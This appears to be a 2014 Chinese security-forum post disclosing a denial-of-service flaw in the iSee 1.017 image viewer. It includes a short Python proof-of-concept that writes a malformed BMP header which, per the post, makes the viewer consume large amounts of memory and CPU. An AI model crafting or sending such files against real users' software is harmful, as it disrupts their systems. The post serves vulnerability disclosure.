首页
社区
课程
招聘
[原创]iSee爱看(最新版1.017)解析漏洞
发表于: 2014-6-13 12:22 2973

[原创]iSee爱看(最新版1.017)解析漏洞

2014-6-13 12:22
2973
www.iseeclan.com/
存在准拒绝服务漏洞。
iSee爱看为一款图片查看工具。
处理一个不到100字节的文件,可以占用系统的大量内存和cpu(300M & 50% cpu)。

poc.py
import os
os.system("color 02")
 
print"###########################################################"
print"#   iSee 1.017     PoC                                    #"
print"###########################################################"
     
header=("\x42\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\x7F\x01\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF")
  
filename = "poc.bmp"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 10
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
mark一下...   这种很多
2014-6-13 12:40
0
雪    币: 39
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
3
怎么发现的额
2014-6-13 13:04
0
游客
登录 | 注册 方可回帖
返回
//